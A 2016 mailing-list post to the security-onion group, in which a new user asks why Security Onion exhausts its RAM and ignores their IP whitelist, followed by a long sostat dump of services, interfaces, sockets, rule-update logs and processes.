Resource depletion high uncategorized unable to whitelist ip successfully
93 views
Skip to first unread message
Robbie Foster
Aug 14, 2016, 3:03:07 PM8/14/16
to security-onion
Sorry about the title. No matter how many ram resources I apply application seems to fill up and crash. I am new to this so please bear with me. I have tried white_list.rules in /etc/nsm/rules. I am getting huge events for my esx and nexenta file sytem that security onion lives on. I need to exempt these ip's from triggering alarm but the whitelist doesn't work. I suspect there is another list somewhere that is reflagging. I am currently at 4 cpu's and 10 gig ram. I had 15 gig ram but it fills up as well. The documentation is more than a little difficult to find any solutions in. I rolled back to a snapshot after soup ran and reran setup with 2 interfaces which are on the same physical nic in esxi, one management and one sniff. I lowered the sniff mtu from 4500 to default recommend. Security Onion seems like a great appliance but it is a steep learning curve in my case. The sostat below is current but doesn't reflect previous attempts. The all time sgueal events are the ip's I need to ignore. System info is xeon E52630 v4, 10 gig ram current and 200 gig drive on vmware esxi a nexenta share back to esx where the security onion vm lives
=========================================================================
Service Status
=========================================================================
Status: securitySO-server
* SO-user server[ OK ]
Status: HIDS
* ossec_agent (SO-user)[ OK ]
Status: Bro
Getting process status ...
Getting peer status ...
Name Type Host Status Pid Peers Started
manager manager localhost running 108979 2 14 Aug 17:37:09
proxy proxy localhost running 109019 2 14 Aug 17:37:11
SO-server-eth1-1 worker localhost running 109060 2 14 Aug 17:37:14
Status: SO-server-eth1
* netsniff-ng (full packet data)[ OK ]
* pcap_agent (SO-user)[ OK ]
* snort_agent-1 (SO-user)[ OK ]
* snort-1 (alert data)[ OK ]
* barnyard2-1 (spooler, unified2 format)[ OK ]
=========================================================================
Interface Status
=========================================================================
eth0 Link encap:Ethernet HWaddr MM:MM:MM:MM:MM:MM
inet addr:X.X.X.X Bcast:X.X.X.X Mask:X.X.X.X
inet6 addr: X.X.X.X/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:33340 errors:0 dropped:0 overruns:0 frame:0
TX packets:19018 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:28314801 (28.3 MB) TX bytes:1886387 (1.8 MB)
eth1 Link encap:Ethernet HWaddr MM:MM:MM:MM:MM:MM
UP BROADCAST RUNNING NOARP PROMISC MULTICAST MTU:1550 Metric:1
RX packets:56106923 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:56503542122 (56.5 GB) TX bytes:0 (0.0 B)
lo Link encap:Local Loopback
inet addr:X.X.X.X Mask:X.X.X.X
inet6 addr: X.X.X.X/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:2744340 errors:0 dropped:0 overruns:0 frame:0
TX packets:2744340 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4550474303 (4.5 GB) TX bytes:4550474303 (4.5 GB)
=========================================================================
Link Statistics
=========================================================================
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default
link/loopback MM:MM:MM:MM:MM:MM brd MM:MM:MM:MM:MM:MM
RX: bytes packets errors dropped overrun mcast
4550474303 2744340 0 0 0 0
RX errors: length crc frame fifo missed
0 0 0 0 0
TX: bytes packets errors dropped carrier collsns
4550474303 2744340 0 0 0 0
TX errors: aborted fifo window heartbeat
0 0 0 0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP mode DEFAULT group default qlen 1000
link/ether MM:MM:MM:MM:MM:MM brd MM:MM:MM:MM:MM:MM
RX: bytes packets errors dropped overrun mcast
28314801 33340 0 0 0 538
RX errors: length crc frame fifo missed
0 0 0 0 0
TX: bytes packets errors dropped carrier collsns
1886387 19018 0 0 0 0
TX errors: aborted fifo window heartbeat
0 0 0 0
3: eth1: <BROADCAST,MULTICAST,NOARP,PROMISC,UP,LOWER_UP> mtu 1550 qdisc mq state UP mode DEFAULT group default qlen 1000
link/ether MM:MM:MM:MM:MM:MM brd MM:MM:MM:MM:MM:MM
RX: bytes packets errors dropped overrun mcast
56503734284 56107111 0 0 0 97545
RX errors: length crc frame fifo missed
0 0 0 0 0
TX: bytes packets errors dropped carrier collsns
0 0 0 0 0 0
TX errors: aborted fifo window heartbeat
0 0 0 0
=========================================================================
Disk Usage
=========================================================================
Filesystem Size Used Avail Use% Mounted on
udev 4.9G 4.0K 4.9G 1% /dev
tmpfs 999M 3.6M 995M 1% /run
/dev/dm-0 187G 50G 128G 29% /
none 4.0K 0 4.0K 0% /sys/fs/cgroup
none 5.0M 0 5.0M 0% /run/lock
none 4.9G 7.6M 4.9G 1% /run/shm
none 100M 28K 100M 1% /run/user
/dev/sda1 236M 48M 177M 22% /boot
=========================================================================
Network Sockets
=========================================================================
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
avahi-dae 1316 avahi 12u IPv4 15407 0t0 UDP *:5353
avahi-dae 1316 avahi 13u IPv6 15408 0t0 UDP *:5353
avahi-dae 1316 avahi 14u IPv4 15409 0t0 UDP *:34750
avahi-dae 1316 avahi 15u IPv6 15410 0t0 UDP *:42098
sshd 1473 root 3u IPv4 13086 0t0 TCP *:ssh_port (LISTEN)
sshd 1473 root 4u IPv6 13088 0t0 TCP *:ssh_port (LISTEN)
cups-brow 1581 root 6u IPv6 20242 0t0 TCP [X.X.X.X]:52879->[X.X.X.X]:631 (CLOSE_WAIT)
cups-brow 1581 root 8u IPv4 20244 0t0 UDP *:631
searchd 1598 sphinxsearch 7u IPv4 14711 0t0 TCP *:9306 (LISTEN)
searchd 1598 sphinxsearch 8u IPv4 14712 0t0 TCP *:9312 (LISTEN)
syslog-ng 1600 root 9u IPv4 14713 0t0 TCP *:514 (LISTEN)
syslog-ng 1600 root 10u IPv4 14714 0t0 UDP *:514
mysqld 1606 mysql 10u IPv4 17992 0t0 TCP X.X.X.X:3306 (LISTEN)
salt-mini 1665 root 13u IPv4 18807 0t0 TCP X.X.X.X:54576->X.X.X.X:4506 (ESTABLISHED)
salt-mini 1665 root 24u IPv4 18842 0t0 TCP X.X.X.X:39672->X.X.X.X:4505 (ESTABLISHED)
ossec-csy 1683 ossecm 5u IPv4 16838 0t0 UDP X.X.X.X:49198->X.X.X.X:514
salt-mast 1787 root 12u IPv4 14887 0t0 TCP *:4505 (LISTEN)
salt-mast 1787 root 14u IPv4 19513 0t0 TCP X.X.X.X:4505->X.X.X.X:39672 (ESTABLISHED)
salt-mast 1801 root 20u IPv4 14893 0t0 TCP *:4506 (LISTEN)
salt-mast 1801 root 22u IPv4 18808 0t0 TCP X.X.X.X:4506->X.X.X.X:54576 (ESTABLISHED)
cupsd 3292 root 10u IPv6 21099 0t0 TCP [X.X.X.X]:631 (LISTEN)
cupsd 3292 root 11u IPv4 21100 0t0 TCP X.X.X.X:631 (LISTEN)
ntpd 4733 ntp 16u IPv4 27047 0t0 UDP *:123
ntpd 4733 ntp 17u IPv6 27048 0t0 UDP *:123
ntpd 4733 ntp 18u IPv4 27054 0t0 UDP X.X.X.X:123
ntpd 4733 ntp 19u IPv4 27055 0t0 UDP X.X.X.X:123
ntpd 4733 ntp 20u IPv6 27056 0t0 UDP [X.X.X.X]:123
ntpd 4733 ntp 21u IPv6 27057 0t0 UDP [X.X.X.X]:123
/usr/sbin 4821 root 5u IPv6 27124 0t0 TCP *:443 (LISTEN)
/usr/sbin 4821 root 7u IPv6 27128 0t0 TCP *:9876 (LISTEN)
/usr/sbin 4821 root 9u IPv6 27134 0t0 TCP *:3154 (LISTEN)
tclsh 16489 SO-user 13u IPv4 220962 0t0 TCP *:7734 (LISTEN)
tclsh 16489 SO-user 14u IPv6 220963 0t0 TCP *:7734 (LISTEN)
tclsh 16489 SO-user 15u IPv4 220966 0t0 TCP *:7736 (LISTEN)
tclsh 16489 SO-user 16u IPv6 220967 0t0 TCP *:7736 (LISTEN)
tclsh 16489 SO-user 17u IPv4 356927 0t0 TCP X.X.X.X:7736->X.X.X.X:48703 (ESTABLISHED)
tclsh 16489 SO-user 18u IPv4 356116 0t0 TCP X.X.X.X:7736->X.X.X.X:60252 (ESTABLISHED)
Error: database is locked: /nsm/bro/spool/state.db
tclsh 16489 SO-user 19u IPv4 356333 0t0 TCP X.X.X.X:7736->X.X.X.X:39679 (ESTABLISHED)
tclsh 16489 SO-user 20u IPv4 509520 0t0 TCP X.X.X.X:7734->X.X.X.X:37874 (ESTABLISHED)
tclsh 67434 SO-user 3u IPv4 358535 0t0 TCP X.X.X.X:48703->X.X.X.X:7736 (ESTABLISHED)
tclsh 67719 SO-user 3u IPv4 357056 0t0 TCP X.X.X.X:60252->X.X.X.X:7736 (ESTABLISHED)
tclsh 67964 SO-user 3u IPv4 357822 0t0 TCP X.X.X.X:39679->X.X.X.X:7736 (ESTABLISHED)
tclsh 67964 SO-user 4u IPv4 357823 0t0 TCP X.X.X.X:8101 (LISTEN)
tclsh 67964 SO-user 6u IPv4 466584 0t0 TCP X.X.X.X:8101->X.X.X.X:33916 (ESTABLISHED)
sshd 107314 root 3u IPv4 461280 0t0 TCP X.X.X.X:ssh_port->X.X.X.X:52220 (ESTABLISHED)
sshd 107385 SO-user 3u IPv4 461280 0t0 TCP X.X.X.X:ssh_port->X.X.X.X:52220 (ESTABLISHED)
bro 108979 SO-user 4u IPv4 466410 0t0 UDP X.X.X.X:43208->X.X.X.X:53
bro 108981 SO-user 0u IPv4 465485 0t0 TCP *:47761 (LISTEN)
bro 108981 SO-user 1u IPv6 465486 0t0 TCP *:47761 (LISTEN)
bro 108981 SO-user 2u IPv4 467205 0t0 TCP X.X.X.X:47761->X.X.X.X:39503 (ESTABLISHED)
bro 108981 SO-user 4u IPv4 466410 0t0 UDP X.X.X.X:43208->X.X.X.X:53
bro 108981 SO-user 268u IPv4 467225 0t0 TCP X.X.X.X:47761->X.X.X.X:39504 (ESTABLISHED)
bro 109019 SO-user 4u IPv4 466457 0t0 UDP X.X.X.X:49233->X.X.X.X:53
bro 109021 SO-user 0u IPv4 465491 0t0 TCP X.X.X.X:39503->X.X.X.X:47761 (ESTABLISHED)
bro 109021 SO-user 4u IPv4 466457 0t0 UDP X.X.X.X:49233->X.X.X.X:53
bro 109021 SO-user 266u IPv4 465496 0t0 TCP *:47762 (LISTEN)
bro 109021 SO-user 267u IPv6 465497 0t0 TCP *:47762 (LISTEN)
bro 109021 SO-user 268u IPv4 465558 0t0 TCP X.X.X.X:47762->X.X.X.X:37169 (ESTABLISHED)
bro 109060 SO-user 4u IPv4 466470 0t0 UDP X.X.X.X:44709->X.X.X.X:53
bro 109061 SO-user 0u IPv4 468147 0t0 TCP X.X.X.X:39504->X.X.X.X:47761 (ESTABLISHED)
bro 109061 SO-user 4u IPv4 466470 0t0 UDP X.X.X.X:44709->X.X.X.X:53
bro 109061 SO-user 266u IPv4 468150 0t0 TCP X.X.X.X:37169->X.X.X.X:47762 (ESTABLISHED)
bro 109061 SO-user 271u IPv4 468155 0t0 TCP *:47763 (LISTEN)
bro 109061 SO-user 272u IPv6 468156 0t0 TCP *:47763 (LISTEN)
barnyard2 109167 SO-user 3u IPv4 468204 0t0 TCP X.X.X.X:33916->X.X.X.X:8101 (ESTABLISHED)
chromium- 110134 SO-user 62u IPv4 478697 0t0 UDP *:5353
chromium- 110134 SO-user 116u IPv6 515554 0t0 TCP [X.X.X.X]:60048->[X.X.X.X]:443 (CLOSE_WAIT)
wish 116156 SO-user 4u IPv4 508860 0t0 TCP X.X.X.X:37874->X.X.X.X:7734 (ESTABLISHED)
/usr/sbin 118049 www-data 5u IPv6 27124 0t0 TCP *:443 (LISTEN)
/usr/sbin 118049 www-data 7u IPv6 27128 0t0 TCP *:9876 (LISTEN)
/usr/sbin 118049 www-data 9u IPv6 27134 0t0 TCP *:3154 (LISTEN)
/usr/sbin 118050 www-data 5u IPv6 27124 0t0 TCP *:443 (LISTEN)
/usr/sbin 118050 www-data 7u IPv6 27128 0t0 TCP *:9876 (LISTEN)
/usr/sbin 118050 www-data 9u IPv6 27134 0t0 TCP *:3154 (LISTEN)
/usr/sbin 118051 www-data 5u IPv6 27124 0t0 TCP *:443 (LISTEN)
/usr/sbin 118051 www-data 7u IPv6 27128 0t0 TCP *:9876 (LISTEN)
/usr/sbin 118051 www-data 9u IPv6 27134 0t0 TCP *:3154 (LISTEN)
/usr/sbin 118071 www-data 5u IPv6 27124 0t0 TCP *:443 (LISTEN)
/usr/sbin 118071 www-data 7u IPv6 27128 0t0 TCP *:9876 (LISTEN)
/usr/sbin 118071 www-data 9u IPv6 27134 0t0 TCP *:3154 (LISTEN)
/usr/sbin 118072 www-data 5u IPv6 27124 0t0 TCP *:443 (LISTEN)
/usr/sbin 118072 www-data 7u IPv6 27128 0t0 TCP *:9876 (LISTEN)
/usr/sbin 118072 www-data 9u IPv6 27134 0t0 TCP *:3154 (LISTEN)
/usr/sbin 118073 www-data 5u IPv6 27124 0t0 TCP *:443 (LISTEN)
/usr/sbin 118073 www-data 7u IPv6 27128 0t0 TCP *:9876 (LISTEN)
/usr/sbin 118073 www-data 9u IPv6 27134 0t0 TCP *:3154 (LISTEN)
=========================================================================
IDS Rules Update
=========================================================================
Sun Aug 14 03:17:24 UTC 2016
Backing up current local_rules.xml file.
Cleaning up local_rules.xml backup files older than 30 days.
Backing up current downloaded.rules file before it gets overwritten.
Cleaning up downloaded.rules backup files older than 30 days.
Backing up current local.rules file before it gets overwritten.
Cleaning up local.rules backup files older than 30 days.
Running PulledPork.
http://code.google.com/p/pulledpork/
_____ ____
`----,\ )
`--==\\ / PulledPork v0.7.0 - Swine Flu!
`--==\\/
.-~~~~-.Y|\\_ Copyright (C) 2009-2013 JJ Cummings
@_/ / 66\_ cumm...@gmail.com
| \ \ _(")
\ /-| ||'--' Rules give me wings!
\_\ \_\\
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Checking latest MD5 for emerging.rules.tar.gz....
Rules tarball download of emerging.rules.tar.gz....
They Match
Done!
Prepping rules from emerging.rules.tar.gz for work....
Done!
Reading rules...
Generating Stub Rules....
Done
Reading rules...
Reading rules...
Modifying Sids....
Done!
Processing /etc/nsm/pulledpork/enablesid.conf....
Modified 0 rules
Done
Processing /etc/nsm/pulledpork/dropsid.conf....
Modified 0 rules
Done
Processing /etc/nsm/pulledpork/disablesid.conf....
Modified 0 rules
Done
Setting Flowbit State....
Enabled 88 flowbits
Done
Writing /etc/nsm/rules/downloaded.rules....
Done
Generating sid-msg.map....
Done
Writing v1 /etc/nsm/rules/sid-msg.map....
Done
Writing /var/log/nsm/sid_changes.log....
Done
Rule Stats...
New:-------3102
Deleted:---158
Enabled Rules:----19810
Dropped Rules:----0
Disabled Rules:---4254
Total Rules:------24064
No IP Blacklist Changes
Done
Please review /var/log/nsm/sid_changes.log for additional details
Fly Piggy Fly!
Sun Aug 14 07:01:01 UTC 2016
Backing up current local_rules.xml file.
Cleaning up local_rules.xml backup files older than 30 days.
Backing up current downloaded.rules file before it gets overwritten.
Cleaning up downloaded.rules backup files older than 30 days.
Backing up current local.rules file before it gets overwritten.
Cleaning up local.rules backup files older than 30 days.
Sleeping for 45 minutes to avoid overwhelming rule sites.
Running PulledPork.
http://code.google.com/p/pulledpork/
_____ ____
`----,\ )
`--==\\ / PulledPork v0.7.0 - Swine Flu!
`--==\\/
.-~~~~-.Y|\\_ Copyright (C) 2009-2013 JJ Cummings
@_/ / 66\_ cumm...@gmail.com
| \ \ _(")
\ /-| ||'--' Rules give me wings!
\_\ \_\\
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Checking latest MD5 for emerging.rules.tar.gz....
They Match
Done!
Prepping rules from emerging.rules.tar.gz for work....
Done!
Reading rules...
Generating Stub Rules....
Done
Reading rules...
Reading rules...
Modifying Sids....
Done!
Processing /etc/nsm/pulledpork/enablesid.conf....
Modified 0 rules
Done
Processing /etc/nsm/pulledpork/dropsid.conf....
Modified 0 rules
Done
Processing /etc/nsm/pulledpork/disablesid.conf....
Modified 0 rules
Done
Setting Flowbit State....
Enabled 88 flowbits
Done
Writing /etc/nsm/rules/downloaded.rules....
Done
Generating sid-msg.map....
Done
Writing v1 /etc/nsm/rules/sid-msg.map....
Done
Writing /var/log/nsm/sid_changes.log....
Done
Rule Stats...
New:-------0
Deleted:---0
Enabled Rules:----19810
Dropped Rules:----0
Disabled Rules:---4254
Total Rules:------24064
No IP Blacklist Changes
Done
Please review /var/log/nsm/sid_changes.log for additional details
Fly Piggy Fly!
=========================================================================
CPU Usage
=========================================================================
Load average for the last 1, 5, and 15 minutes:
10.88 9.87 9.87
Processing units: 4
If load average is higher than processing units,
then tune until load average is lower than processing units.
top - 18:40:16 up 14:49, 2 users, load average: 10.88, 9.87, 9.87
Tasks: 323 total, 6 running, 317 sleeping, 0 stopped, 0 zombie
%Cpu(s): 2.4 us, 0.6 sy, 0.0 ni, 91.6 id, 5.4 wa, 0.0 hi, 0.1 si, 0.0 st
KiB Mem: 10223820 total, 10090688 used, 133132 free, 28552 buffers
KiB Swap: 10485756 total, 81100 used, 10404656 free. 6745704 cached Mem
%CPU %MEM COMMAND
30.5 0.0 /opt/bro/bin/capstats -I 5 -n 1 -i eth1
16.1 4.0 snort -c /etc/nsm/SO-server-eth1/snort.conf -u SO-user -g SO-user -i eth1 -l /nsm/sensor_data/SO-server-eth1/snort-1 --perfmon-file /nsm/sensor_data/SO-server-eth1/snort-1.stats -U
11.0 1.1 /opt/bro/bin/bro -i eth1 -U .status -p broctl -p broctl-live -p local -p SO-server-eth1-1 local.bro broctl base/frameworks/cluster local-worker.bro broctl/auto
8.6 0.0 [kworker/0:2]
8.0 0.7 perl /opt/elsa/web/cron.pl -c /etc/elsa_web.conf
6.9 0.9 /usr/lib/chromium-browser/chro
6.1 0.1 barnyard2 -c /etc/nsm/SO-server-eth1/barnyard2-1.conf -u SO-user -g SO-user -d /nsm/sensor_data/SO-server-eth1/snort-1 -f snort.unified2 -w /etc/nsm/SO-server-eth1/barnyard2.waldo-1 -i 1 -U
5.1 2.7 netsniff-ng -i eth1 -o /nsm/sensor_data/SO-server-eth1/dailylogs/2016-08-14/ --user 1001 --group 1001 -s --prefix snort.log. --verbose --ring-size 256 iB --interval 150 iB
3.8 0.3 wish /usr/bin/SO-user.tk
3.0 0.9 chromium-browser --enable-pinch https://localhost/squert
2.9 0.0 [watchdog/0]
2.9 0.4 /opt/bro/bin/bro -U .status -p broctl -p broctl-live -p local -p manager local.bro broctl base/frameworks/cluster local-manager.bro broctl/auto
2.5 0.4 /opt/bro/bin/bro -U .status -p broctl -p broctl-live -p local -p proxy local.bro broctl base/frameworks/cluster local-proxy broctl/auto
2.5 0.0 [kworker/u256:5]
2.5 0.0 [kworker/u256:4]
2.3 0.0 [ksoftirqd/0]
1.9 0.0 [kworker/u256:3]
1.8 0.3 /usr/bin/X -core :0 -seat seat0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch
1.6 0.0 [kworker/u256:2]
1.6 0.0 [kworker/1:5]
1.5 0.0 [kworker/u256:1]
1.4 1.0 /usr/sbin/mysqld
1.2 0.0 [kworker/3:1]
1.2 0.0 [kworker/2:0]
1.0 2.9 /usr/bin/searchd --nodetach
0.9 0.0 [migration/0]
0.8 0.1 /usr/bin/python /opt/bro/bin/broctl cron
0.7 0.0 [watchdog/1]
0.7 0.0 [watchdog/2]
0.7 0.0 [watchdog/3]
0.7 0.0 [kworker/2:4]
0.3 0.0 [ksoftirqd/2]
0.3 0.0 [migration/3]
0.3 0.0 [ksoftirqd/3]
0.3 0.0 /usr/lib/rtkit/rtkit-daemon
0.3 6.8 tclsh /usr/bin/SO-userd -c /etc/nsm/securitySO-server/SO-userd.conf -a /etc/nsm/securitySO-server/autocat.conf -g /etc/nsm/securitySO-server/SO-userd.queries -A /etc/nsm/securitySO-server/SO-userd.access -C /etc/nsm/securitySO-server/certs
0.3 0.0 tclsh /usr/bin/snort_agent.tcl -c /etc/nsm/SO-server-eth1/snort_agent-1.conf
0.3 0.0 [kworker/u256:0]
0.3 0.6 /usr/lib/chromium-browser/chro
0.2 0.0 [rcu_sched]
0.2 0.0 [migration/1]
0.2 0.0 [migration/2]
0.2 0.0 [jbd2/dm-0-8]
0.2 0.1 /usr/sbin/syslog-ng -p /var/run/syslog-ng.pid
0.2 0.3 /usr/bin/python /usr/bin/salt-master
0.2 0.0 /usr/bin/vmtoolsd
0.2 0.3 xfdesktop
0.2 0.1 /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libwhiskermenu.so 1 16777248 whiskermenu Whisker Menu Show a menu to easily access installed applications
0.1 0.0 [kswapd0]
0.1 0.0 /var/ossec/bin/ossec-syscheckd
0.1 0.4 perl /opt/elsa/node/elsa.pl -c /etc/elsa_node.conf
0.1 0.7 /opt/bro/bin/bro -i eth1 -U .status -p broctl -p broctl-live -p local -p SO-server-eth1-1 local.bro broctl base/frameworks/cluster local-worker.bro broctl/auto
0.1 0.0 /usr/lib/x86_64-linux-gnu/indicator-messages/indicator-messages-service
0.1 0.2 chromium-browser --enable-features=DocumentWriteEvaluator<DocumentWriteEvaluator,RenderingPipelineThrottling<RenderingPipelineThrottling,V8_Serialize_Age_Code<V8SerializeOptions,V8_Serialize_Eager<V8SerializeOptions,WebRTC-H264WithOpenH264FFmpeg<WebRTC-H264WithOpenH264FFmpeg,token-binding<TokenBinding,use-new-media-cache<use-new-media-cache --force-fieldtrials=AsyncDNS/AsyncDNSA/AutofillClassifier/Enabled/AutofillFieldMetadata/Enabled/AutofillProfileOrderByFrecency/EnabledLimitTo3/CaptivePortalInterstitial/Enabled/ChromeDashboard/Enabled/ChromotingQUIC/Enabled/DocumentWriteEvaluator/Enabled/EnableGoogleCachedCopyTextExperiment/Button/EnableSessionCrashedBubbleUI/Enabled/*ExtensionActionRedesign/Enabled/InstanceID/Enabled/LocalNTPSuggestionsService/Enabled/MaterialDesignDownloads/Enabled/OfferUploadCreditCards/Enabled/PageRevisitInstrumentation/Enabled/PasswordBranding/SmartLockBrandingSavePromptOnly/*QUIC/Enabled/RefreshTokenDeviceId/Enabled/RenderingPipelineThrottling/Enabled/ReportCertificateErrors/ShowAndPossiblySend/ResourcePriorities/AllExceptAsyncScripts_11011_1_1_10/SSLCommonNameMismatchHandling/Enabled/SafeBrowsingReportPhishingErrorLink/Enabled/SafeBrowsingUnverifiedDownloads/DisableByParameterMostSbTypes2/SafeBrowsingUpdateFrequency/UpdateTime15m/SchedulerExpensiveTaskBlocking/Enabled/SdchPersistence/Enabled/SimpleCacheTrial/ExperimentYes/StrictSecureCookies/Enabled/SyncHttpContentCompression/Enabled/TabSyncByRecency/Enabled/*TokenBinding/TokenBinding/V8SerializeOptions/SerializeEagerAndAgeCode/VarationsServiceControl/Interval_30min/WebFontsIntervention/Enabled/WebRTC-H264WithOpenH264FFmpeg/Enabled/WebRTC-LocalIPPermissionCheck/Enabled/WebRTC-PeerConnectionDTLS1.2/Enabled/use-new-media-cache/Enabled/ --type=gpu-process --channel=110134.0.1621162264 --window-depth=24 --supports-dual-gpus=false --gpu-driver-bug-workarounds=4,54 --gpu-vendor-id=0x15ad --gpu-device-id=0x0405 --gpu-driver-vendor --gpu-driver-version --v8-natives-passed-by-fd --v8-snapshot-passed-by-
0.0 0.0 /sbin/init
0.0 0.0 [kthreadd]
0.0 0.0 [kworker/0:0H]
0.0 0.0 [rcu_bh]
0.0 0.0 [rcuos/0]
0.0 0.0 [rcuob/0]
0.0 0.0 [ksoftirqd/1]
0.0 0.0 [kworker/1:0H]
0.0 0.0 [rcuos/1]
0.0 0.0 [rcuob/1]
0.0 0.0 [kworker/2:0H]
0.0 0.0 [rcuos/2]
0.0 0.0 [rcuob/2]
0.0 0.0 [kworker/3:0H]
0.0 0.0 [rcuos/3]
0.0 0.0 [rcuob/3]
0.0 0.0 [khelper]
0.0 0.0 [kdevtmpfs]
0.0 0.0 [netns]
0.0 0.0 [perf]
0.0 0.0 [khungtaskd]
0.0 0.0 [writeback]
0.0 0.0 [ksmd]
0.0 0.0 [khugepaged]
0.0 0.0 [crypto]
0.0 0.0 [kintegrityd]
0.0 0.0 [bioset]
0.0 0.0 [kblockd]
0.0 0.0 [ata_sff]
0.0 0.0 [md]
0.0 0.0 [devfreq_wq]
0.0 0.0 [fsnotify_mark]
0.0 0.0 [ecryptfs-kthrea]
0.0 0.0 [kthrotld]
0.0 0.0 [acpi_thermal_pm]
0.0 0.0 [scsi_eh_0]
0.0 0.0 [scsi_tmf_0]
0.0 0.0 [scsi_eh_1]
0.0 0.0 [scsi_tmf_1]
0.0 0.0 [ipv6_addrconf]
0.0 0.0 [deferwq]
0.0 0.0 [charger_manager]
0.0 0.0 [ttm_swap]
0.0 0.0 [kpsmoused]
0.0 0.0 [mpt_poll_0]
0.0 0.0 [scsi_eh_2]
0.0 0.0 [scsi_tmf_2]
0.0 0.0 [scsi_eh_3]
0.0 0.0 [mpt/0]
0.0 0.0 [scsi_tmf_3]
0.0 0.0 [scsi_eh_4]
0.0 0.0 [scsi_tmf_4]
0.0 0.0 [scsi_eh_5]
0.0 0.0 [scsi_tmf_5]
0.0 0.0 [scsi_eh_6]
0.0 0.0 [scsi_tmf_6]
0.0 0.0 [scsi_eh_7]
0.0 0.0 [scsi_tmf_7]
0.0 0.0 [scsi_eh_8]
0.0 0.0 [scsi_tmf_8]
0.0 0.0 [scsi_eh_9]
0.0 0.0 [scsi_tmf_9]
0.0 0.0 [scsi_eh_10]
0.0 0.0 [scsi_tmf_10]
0.0 0.0 [scsi_eh_11]
0.0 0.0 [scsi_tmf_11]
0.0 0.0 [scsi_eh_12]
0.0 0.0 [scsi_tmf_12]
0.0 0.0 [scsi_eh_13]
0.0 0.0 [scsi_tmf_13]
0.0 0.0 [scsi_eh_14]
0.0 0.0 [scsi_tmf_14]
0.0 0.0 [scsi_eh_15]
0.0 0.0 [scsi_tmf_15]
0.0 0.0 [scsi_eh_16]
0.0 0.0 [scsi_tmf_16]
0.0 0.0 [scsi_eh_17]
0.0 0.0 [scsi_tmf_17]
0.0 0.0 [scsi_eh_18]
0.0 0.0 [scsi_tmf_18]
0.0 0.0 [scsi_eh_19]
0.0 0.0 [scsi_tmf_19]
0.0 0.0 [scsi_eh_20]
0.0 0.0 [scsi_tmf_20]
0.0 0.0 [scsi_eh_21]
0.0 0.0 [scsi_tmf_21]
0.0 0.0 [scsi_eh_22]
0.0 0.0 [scsi_tmf_22]
0.0 0.0 [scsi_eh_23]
0.0 0.0 [scsi_tmf_23]
0.0 0.0 [scsi_eh_24]
0.0 0.0 [scsi_tmf_24]
0.0 0.0 [scsi_eh_25]
0.0 0.0 [scsi_tmf_25]
0.0 0.0 [scsi_eh_26]
0.0 0.0 [scsi_tmf_26]
0.0 0.0 [scsi_eh_27]
0.0 0.0 [scsi_tmf_27]
0.0 0.0 [scsi_eh_28]
0.0 0.0 [scsi_tmf_28]
0.0 0.0 [scsi_eh_29]
0.0 0.0 [scsi_tmf_29]
0.0 0.0 [scsi_eh_30]
0.0 0.0 [scsi_tmf_30]
0.0 0.0 [scsi_eh_31]
0.0 0.0 [scsi_tmf_31]
0.0 0.0 [scsi_eh_32]
0.0 0.0 [scsi_tmf_32]
0.0 0.0 [kworker/0:1H]
0.0 0.0 [kdmflush]
0.0 0.0 [bioset]
0.0 0.0 [kdmflush]
0.0 0.0 [bioset]
0.0 0.0 [bioset]
0.0 0.0 [ext4-rsv-conver]
0.0 0.0 upstart-udev-bridge --daemon
0.0 0.0 /lib/systemd/systemd-udevd --daemon
0.0 0.0 [kmpathd]
0.0 0.0 [kmpath_handlerd]
0.0 0.0 [kworker/3:1H]
0.0 0.0 upstart-socket-bridge --daemon
0.0 0.0 [ext4-rsv-conver]
0.0 0.0 dbus-daemon --system --fork
0.0 0.0 upstart-file-bridge --daemon
0.0 0.0 /lib/systemd/systemd-logind
0.0 0.0 /usr/sbin/bluetoothd
0.0 0.0 avahi-daemon: running [SO-server.local]
0.0 0.0 avahi-daemon: chroot helper
0.0 0.0 [krfcommd]
0.0 0.0 /sbin/getty -8 38400 tty4
0.0 0.0 /sbin/getty -8 38400 tty5
0.0 0.0 /usr/bin/python /usr/bin/salt-minion
0.0 0.0 /sbin/getty -8 38400 tty2
0.0 0.0 /sbin/getty -8 38400 tty3
0.0 0.1 /usr/bin/python /usr/bin/salt-master
0.0 0.0 /sbin/getty -8 38400 tty6
0.0 0.0 /usr/sbin/sshd -D
0.0 0.0 cron
0.0 0.0 su -s /bin/sh -c exec "$0" "$@" sphinxsearch -- /usr/bin/searchd --nodetach
0.0 0.0 [kauditd]
0.0 0.0 /usr/sbin/cups-browsed
0.0 0.0 supervising syslog-ng
0.0 0.0 acpid -c /etc/acpi/events -s /var/run/acpid.socket
0.0 0.0 /usr/sbin/kerneloops
0.0 0.2 /usr/bin/python /usr/bin/salt-minion
0.0 0.0 /var/ossec/bin/ossec-csyslogd
0.0 0.0 /var/ossec/bin/ossec-execd
0.0 0.0 /var/ossec/bin/ossec-analysisd
0.0 0.0 lightdm
0.0 0.0 /var/ossec/bin/ossec-logcollector
0.0 0.0 /usr/lib/accountsservice/accounts-daemon
0.0 0.0 /usr/lib/policykit-1/polkitd --no-debug
0.0 0.1 /usr/bin/python /usr/bin/salt-master
0.0 0.1 /usr/bin/python /usr/bin/salt-master
0.0 0.1 /usr/bin/python /usr/bin/salt-master
0.0 0.3 /usr/bin/python /usr/bin/salt-master
0.0 0.3 /usr/bin/python /usr/bin/salt-master
0.0 0.3 /usr/bin/python /usr/bin/salt-master
